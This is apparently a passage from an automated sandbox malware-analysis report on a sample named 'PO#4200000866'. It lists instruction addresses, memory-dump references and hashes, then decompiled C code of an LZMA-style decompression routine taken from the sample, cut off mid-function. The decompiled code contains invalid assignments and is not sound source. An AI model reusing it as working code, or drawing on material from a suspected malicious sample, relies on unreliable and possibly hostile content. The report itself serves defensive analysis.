                                                                                      0x00407242
                                                                                      0x00407244
                                                                                      0x00407247
                                                                                      0x0040724a
                                                                                      0x0040724a
                                                                                      0x0040724d
                                                                                      0x0040724d
                                                                                      0x00407250
                                                                                      0x00407257
                                                                                      0x0040722b
                                                                                      0x0040722b
                                                                                      0x0040722b
                                                                                      0x0040722b
                                                                                      0x00000000
                                                                                      0x00407259
                                                                                      0x00000000
                                                                                      0x00407259
                                                                                      0x00407257
                                                                                      0x004071dd
                                                                                      0x004071e0
                                                                                      0x004071e2
                                                                                      0x004071e5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406f44
                                                                                      0x00406f44
                                                                                      0x00406f48
                                                                                      0x0040758d
                                                                                      0x00000000
                                                                                      0x0040758d
                                                                                      0x00406f4e
                                                                                      0x00406f51
                                                                                      0x00406f54
                                                                                      0x00406f57
                                                                                      0x00406f5a
                                                                                      0x00406f5d
                                                                                      0x00406f60
                                                                                      0x00406f62
                                                                                      0x00406f65
                                                                                      0x00406f68
                                                                                      0x00406f6b
                                                                                      0x00406f6d
                                                                                      0x00406f6d
                                                                                      0x00406f6d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070cf
                                                                                      0x004070cf
                                                                                      0x004070d3
                                                                                      0x00407599
                                                                                      0x00000000
                                                                                      0x00407599
                                                                                      0x004070d9
                                                                                      0x004070dc
                                                                                      0x004070df
                                                                                      0x004070e2
                                                                                      0x004070e4
                                                                                      0x004070e4
                                                                                      0x004070e4
                                                                                      0x004070e7
                                                                                      0x004070ea
                                                                                      0x004070ed
                                                                                      0x004070f0
                                                                                      0x004070f3
                                                                                      0x004070f6
                                                                                      0x004070f7
                                                                                      0x004070f9
                                                                                      0x004070f9
                                                                                      0x004070f9
                                                                                      0x004070fc
                                                                                      0x004070ff
                                                                                      0x00407102
                                                                                      0x00407105
                                                                                      0x00407105
                                                                                      0x00407105
                                                                                      0x00407108
                                                                                      0x0040710a
                                                                                      0x0040710a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040734c
                                                                                      0x0040734c
                                                                                      0x0040734c
                                                                                      0x00407350
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407356
                                                                                      0x00407359
                                                                                      0x0040735c
                                                                                      0x0040735f
                                                                                      0x00407361
                                                                                      0x00407361
                                                                                      0x00407361
                                                                                      0x00407364
                                                                                      0x00407367
                                                                                      0x0040736a
                                                                                      0x0040736d
                                                                                      0x00407370
                                                                                      0x00407373
                                                                                      0x00407374
                                                                                      0x00407376
                                                                                      0x00407376
                                                                                      0x00407376
                                                                                      0x00407379
                                                                                      0x0040737c
                                                                                      0x0040737f
                                                                                      0x00407382
                                                                                      0x00407385
                                                                                      0x00407389
                                                                                      0x0040738b
                                                                                      0x0040738e
                                                                                      0x00000000
                                                                                      0x00407390
                                                                                      0x0040710d
                                                                                      0x0040710d
                                                                                      0x00000000
                                                                                      0x0040710d
                                                                                      0x0040738e
                                                                                      0x004075c3
                                                                                      0x004075e5
                                                                                      0x004075eb
                                                                                      0x004075ed
                                                                                      0x004075f4
                                                                                      0x004075f6
                                                                                      0x004075fd
                                                                                      0x00407601
                                                                                      0x00000000
                                                                                      0x00406bf2
                                                                                      0x004075fa
                                                                                      0x004075fa
                                                                                      0x00000000
                                                                                      0x004075fa
                                                                                      0x00407447
                                                                                      0x004074cd
                                                                                      0x004074d3
                                                                                      0x004074d6
                                                                                      0x004074d9
                                                                                      0x004074dc
                                                                                      0x004074df
                                                                                      0x004074e2
                                                                                      0x004074e5
                                                                                      0x004074e8
                                                                                      0x004074ee
                                                                                      0x00407507
                                                                                      0x0040750a
                                                                                      0x0040750d
                                                                                      0x00407510
                                                                                      0x00407514
                                                                                      0x00407516
                                                                                      0x00407517
                                                                                      0x0040751a
                                                                                      0x004074f0
                                                                                      0x004074f0
                                                                                      0x004074f8
                                                                                      0x004074fd
                                                                                      0x004074ff
                                                                                      0x00407502
                                                                                      0x00407502
                                                                                      0x00407524
                                                                                      0x00000000
                                                                                      0x00407526
                                                                                      0x00000000
                                                                                      0x00407526
                                                                                      0x00407524
                                                                                      0x00000000
                                                                                      0x00407399

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                      • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                                                      • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                      • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 98%
                                                                                      			E004070AB() {
                                                                                      				unsigned short _t532;
                                                                                      				signed int _t533;
                                                                                      				void _t534;
                                                                                      				void* _t535;
                                                                                      				signed int _t536;
                                                                                      				signed int _t565;
                                                                                      				signed int _t568;
                                                                                      				signed int _t589;
                                                                                      				signed int* _t606;
                                                                                      				void* _t613;
                                                                                      
                                                                                      				L0:
                                                                                      				while(1) {
                                                                                      					L0:
                                                                                      					if( *(_t613 - 0x40) != 0) {
                                                                                      						L89:
                                                                                      						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                                                      						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                                                      						L69:
                                                                                      						_t606 =  *(_t613 - 0x58);
                                                                                      						 *(_t613 - 0x84) = 0x12;
                                                                                      						L132:
                                                                                      						 *(_t613 - 0x54) = _t606;
                                                                                      						L133:
                                                                                      						_t532 =  *_t606;
                                                                                      						_t589 = _t532 & 0x0000ffff;
                                                                                      						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                      						if( *(_t613 - 0xc) >= _t565) {
                                                                                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                      							 *(_t613 - 0x40) = 1;
                                                                                      							_t533 = _t532 - (_t532 >> 5);
                                                                                      							 *_t606 = _t533;
                                                                                      						} else {
                                                                                      							 *(_t613 - 0x10) = _t565;
                                                                                      							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                      							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                                                      						}
                                                                                      						if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                      							L139:
                                                                                      							_t534 =  *(_t613 - 0x84);
                                                                                      							L140:
                                                                                      							 *(_t613 - 0x88) = _t534;
                                                                                      							goto L1;
                                                                                      						} else {
                                                                                      							L137:
                                                                                      							if( *(_t613 - 0x6c) == 0) {
                                                                                      								 *(_t613 - 0x88) = 5;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                      							goto L139;
                                                                                      						}
                                                                                      					} else {
                                                                                      						if( *(__ebp - 0x60) == 0) {
                                                                                      							L171:
                                                                                      							_t536 = _t535 | 0xffffffff;
                                                                                      							L172:
                                                                                      							return _t536;
                                                                                      						}
                                                                                      						__eax = 0;
                                                                                      						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                      						0 | _t258 = _t258 + _t258 + 9;
                                                                                      						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                      						L75:
                                                                                      						if( *(__ebp - 0x64) == 0) {
                                                                                      							 *(__ebp - 0x88) = 0x1b;
                                                                                      							L170:
                                                                                      							_t568 = 0x22;
                                                                                      							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                      							_t536 = 0;
                                                                                      							goto L172;
                                                                                      						}
                                                                                      						__eax =  *(__ebp - 0x14);
                                                                                      						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      						if(__eax >=  *(__ebp - 0x74)) {
                                                                                      							__eax = __eax +  *(__ebp - 0x74);
                                                                                      						}
                                                                                      						__edx =  *(__ebp - 8);
                                                                                      						__cl =  *(__eax + __edx);
                                                                                      						__eax =  *(__ebp - 0x14);
                                                                                      						 *(__ebp - 0x5c) = __cl;
                                                                                      						 *(__eax + __edx) = __cl;
                                                                                      						__eax = __eax + 1;
                                                                                      						__edx = 0;
                                                                                      						_t274 = __eax %  *(__ebp - 0x74);
                                                                                      						__eax = __eax /  *(__ebp - 0x74);
                                                                                      						__edx = _t274;
                                                                                      						__eax =  *(__ebp - 0x68);
                                                                                      						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                      						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      						_t283 = __ebp - 0x64;
                                                                                      						 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                      						 *( *(__ebp - 0x68)) = __cl;
                                                                                      						L79:
                                                                                      						 *(__ebp - 0x14) = __edx;
                                                                                      						L80:
                                                                                      						 *(__ebp - 0x88) = 2;
                                                                                      					}
                                                                                      					L1:
                                                                                      					_t535 =  *(_t613 - 0x88);
                                                                                      					if(_t535 > 0x1c) {
                                                                                      						goto L171;
                                                                                      					}
                                                                                      					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
                                                                                      						case 0:
                                                                                      							if( *(_t613 - 0x6c) == 0) {
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                      							_t535 =  *( *(_t613 - 0x70));
                                                                                      							if(_t535 > 0xe1) {
                                                                                      								goto L171;
                                                                                      							}
                                                                                      							_t539 = _t535 & 0x000000ff;
                                                                                      							_push(0x2d);
                                                                                      							asm("cdq");
                                                                                      							_pop(_t570);
                                                                                      							_push(9);
                                                                                      							_pop(_t571);
                                                                                      							_t609 = _t539 / _t570;
                                                                                      							_t541 = _t539 % _t570 & 0x000000ff;
                                                                                      							asm("cdq");
                                                                                      							_t604 = _t541 % _t571 & 0x000000ff;
                                                                                      							 *(_t613 - 0x3c) = _t604;
                                                                                      							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                      							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                                                      							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                      							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                      								L10:
                                                                                      								if(_t612 == 0) {
                                                                                      									L12:
                                                                                      									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                      									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                      									goto L15;
                                                                                      								} else {
                                                                                      									goto L11;
                                                                                      								}
                                                                                      								do {
                                                                                      									L11:
                                                                                      									_t612 = _t612 - 1;
                                                                                      									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                      								} while (_t612 != 0);
                                                                                      								goto L12;
                                                                                      							}
                                                                                      							if( *(_t613 - 4) != 0) {
                                                                                      								GlobalFree( *(_t613 - 4));
                                                                                      							}
                                                                                      							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                                                      							 *(_t613 - 4) = _t535;
                                                                                      							if(_t535 == 0) {
                                                                                      								goto L171;
                                                                                      							} else {
                                                                                      								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                      								goto L10;
                                                                                      							}
                                                                                      						case 1:
                                                                                      							L13:
                                                                                      							__eflags =  *(_t613 - 0x6c);
                                                                                      							if( *(_t613 - 0x6c) == 0) {
                                                                                      								 *(_t613 - 0x88) = 1;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                      							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                      							_t45 = _t613 - 0x48;
                                                                                      							 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                      							__eflags =  *_t45;
                                                                                      							L15:
                                                                                      							if( *(_t613 - 0x48) < 4) {
                                                                                      								goto L13;
                                                                                      							}
                                                                                      							_t547 =  *(_t613 - 0x40);
                                                                                      							if(_t547 ==  *(_t613 - 0x74)) {
                                                                                      								L20:
                                                                                      								 *(_t613 - 0x48) = 5;
                                                                                      								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                      								goto L23;
                                                                                      							}
                                                                                      							 *(_t613 - 0x74) = _t547;
                                                                                      							if( *(_t613 - 8) != 0) {
                                                                                      								GlobalFree( *(_t613 - 8));
                                                                                      							}
                                                                                      							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                      							 *(_t613 - 8) = _t535;
                                                                                      							if(_t535 == 0) {
                                                                                      								goto L171;
                                                                                      							} else {
                                                                                      								goto L20;
                                                                                      							}
                                                                                      						case 2:
                                                                                      							L24:
                                                                                      							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                      							 *(_t613 - 0x84) = 6;
                                                                                      							 *(_t613 - 0x4c) = _t554;
                                                                                      							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                                                      							goto L132;
                                                                                      						case 3:
                                                                                      							L21:
                                                                                      							__eflags =  *(_t613 - 0x6c);
                                                                                      							if( *(_t613 - 0x6c) == 0) {
                                                                                      								 *(_t613 - 0x88) = 3;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                      							_t67 = _t613 - 0x70;
                                                                                      							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                      							__eflags =  *_t67;
                                                                                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                      							L23:
                                                                                      							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                      							if( *(_t613 - 0x48) != 0) {
                                                                                      								goto L21;
                                                                                      							}
                                                                                      							goto L24;
                                                                                      						case 4:
                                                                                      							goto L133;
                                                                                      						case 5:
                                                                                      							goto L137;
                                                                                      						case 6:
                                                                                      							__edx = 0;
                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                      								__eax =  *(__ebp - 4);
                                                                                      								__ecx =  *(__ebp - 0x38);
                                                                                      								 *(__ebp - 0x34) = 1;
                                                                                      								 *(__ebp - 0x84) = 7;
                                                                                      								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                      								goto L132;
                                                                                      							}
                                                                                      							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                      							__esi =  *(__ebp - 0x60);
                                                                                      							__cl = 8;
                                                                                      							__cl = 8 -  *(__ebp - 0x3c);
                                                                                      							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                      							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                      							__ecx =  *(__ebp - 0x3c);
                                                                                      							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                      							__ecx =  *(__ebp - 4);
                                                                                      							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                      							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                      							__eflags =  *(__ebp - 0x38) - 4;
                                                                                      							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      							if( *(__ebp - 0x38) >= 4) {
                                                                                      								__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                      								if( *(__ebp - 0x38) >= 0xa) {
                                                                                      									_t98 = __ebp - 0x38;
                                                                                      									 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                      									__eflags =  *_t98;
                                                                                      								} else {
                                                                                      									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                      								}
                                                                                      							} else {
                                                                                      								 *(__ebp - 0x38) = 0;
                                                                                      							}
                                                                                      							__eflags =  *(__ebp - 0x34) - __edx;
                                                                                      							if( *(__ebp - 0x34) == __edx) {
                                                                                      								__ebx = 0;
                                                                                      								__ebx = 1;
                                                                                      								goto L61;
                                                                                      							} else {
                                                                                      								__eax =  *(__ebp - 0x14);
                                                                                      								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      								__eflags = __eax -  *(__ebp - 0x74);
                                                                                      								if(__eax >=  *(__ebp - 0x74)) {
                                                                                      									__eax = __eax +  *(__ebp - 0x74);
                                                                                      									__eflags = __eax;
                                                                                      								}
                                                                                      								__ecx =  *(__ebp - 8);
                                                                                      								__ebx = 0;
                                                                                      								__ebx = 1;
                                                                                      								__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                      								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                      								goto L41;
                                                                                      							}
                                                                                      						case 7:
                                                                                      							__eflags =  *(__ebp - 0x40) - 1;
                                                                                      							if( *(__ebp - 0x40) != 1) {
                                                                                      								__eax =  *(__ebp - 0x24);
                                                                                      								 *(__ebp - 0x80) = 0x16;
                                                                                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      								__eax =  *(__ebp - 0x28);
                                                                                      								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      								__eax =  *(__ebp - 0x2c);
                                                                                      								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      								__eax = 0;
                                                                                      								__eflags =  *(__ebp - 0x38) - 7;
                                                                                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      								__al = __al & 0x000000fd;
                                                                                      								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                      								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                      								__eax =  *(__ebp - 4);
                                                                                      								__eax =  *(__ebp - 4) + 0x664;
                                                                                      								__eflags = __eax;
                                                                                      								 *(__ebp - 0x58) = __eax;
                                                                                      								goto L69;
                                                                                      							}
                                                                                      							__eax =  *(__ebp - 4);
                                                                                      							__ecx =  *(__ebp - 0x38);
                                                                                      							 *(__ebp - 0x84) = 8;
                                                                                      							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                      							goto L132;
                                                                                      						case 8:
                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                      								__eax =  *(__ebp - 4);
                                                                                      								__ecx =  *(__ebp - 0x38);
                                                                                      								 *(__ebp - 0x84) = 0xa;
                                                                                      								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                      							} else {
                                                                                      								__eax =  *(__ebp - 0x38);
                                                                                      								__ecx =  *(__ebp - 4);
                                                                                      								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                      								 *(__ebp - 0x84) = 9;
                                                                                      								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                      								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                      							}
                                                                                      							goto L132;
                                                                                      						case 9:
                                                                                      							goto L0;
                                                                                      						case 0xa:
                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                      								__eax =  *(__ebp - 4);
                                                                                      								__ecx =  *(__ebp - 0x38);
                                                                                      								 *(__ebp - 0x84) = 0xb;
                                                                                      								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                      								goto L132;
                                                                                      							}
                                                                                      							__eax =  *(__ebp - 0x28);
                                                                                      							goto L88;
                                                                                      						case 0xb:
                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                      								__ecx =  *(__ebp - 0x24);
                                                                                      								__eax =  *(__ebp - 0x20);
                                                                                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      							} else {
                                                                                      								__eax =  *(__ebp - 0x24);
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 0x28);
                                                                                      							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      							L88:
                                                                                      							__ecx =  *(__ebp - 0x2c);
                                                                                      							 *(__ebp - 0x2c) = __eax;
                                                                                      							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      							goto L89;
                                                                                      						case 0xc:
                                                                                      							L99:
                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                      								 *(__ebp - 0x88) = 0xc;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							_t334 = __ebp - 0x70;
                                                                                      							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                      							__eflags =  *_t334;
                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							__eax =  *(__ebp - 0x2c);
                                                                                      							goto L101;
                                                                                      						case 0xd:
                                                                                      							L37:
                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                      								 *(__ebp - 0x88) = 0xd;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							_t122 = __ebp - 0x70;
                                                                                      							 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                      							__eflags =  *_t122;
                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							L39:
                                                                                      							__eax =  *(__ebp - 0x40);
                                                                                      							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                      								goto L48;
                                                                                      							}
                                                                                      							__eflags = __ebx - 0x100;
                                                                                      							if(__ebx >= 0x100) {
                                                                                      								goto L54;
                                                                                      							}
                                                                                      							L41:
                                                                                      							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                      							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                      							__ecx =  *(__ebp - 0x58);
                                                                                      							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                      							 *(__ebp - 0x48) = __eax;
                                                                                      							__eax = __eax + 1;
                                                                                      							__eax = __eax << 8;
                                                                                      							__eax = __eax + __ebx;
                                                                                      							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      							__ax =  *__esi;
                                                                                      							 *(__ebp - 0x54) = __esi;
                                                                                      							__edx = __ax & 0x0000ffff;
                                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                      							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      								__cx = __ax;
                                                                                      								 *(__ebp - 0x40) = 1;
                                                                                      								__cx = __ax >> 5;
                                                                                      								__eflags = __eax;
                                                                                      								__ebx = __ebx + __ebx + 1;
                                                                                      								 *__esi = __ax;
                                                                                      							} else {
                                                                                      								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                                      								0x800 = 0x800 - __edx;
                                                                                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                      								__ebx = __ebx + __ebx;
                                                                                      								 *__esi = __cx;
                                                                                      							}
                                                                                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      								goto L39;
                                                                                      							} else {
                                                                                      								goto L37;
                                                                                      							}
                                                                                      						case 0xe:
                                                                                      							L46:
                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                      								 *(__ebp - 0x88) = 0xe;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							_t156 = __ebp - 0x70;
                                                                                      							 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                      							__eflags =  *_t156;
                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							while(1) {
                                                                                      								L48:
                                                                                      								__eflags = __ebx - 0x100;
                                                                                      								if(__ebx >= 0x100) {
                                                                                      									break;
                                                                                      								}
                                                                                      								__eax =  *(__ebp - 0x58);
                                                                                      								__edx = __ebx + __ebx;
                                                                                      								__ecx =  *(__ebp - 0x10);
                                                                                      								__esi = __edx + __eax;
                                                                                      								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      								__ax =  *__esi;
                                                                                      								 *(__ebp - 0x54) = __esi;
                                                                                      								__edi = __ax & 0x0000ffff;
                                                                                      								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      								__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      								if( *(__ebp - 0xc) >= __ecx) {
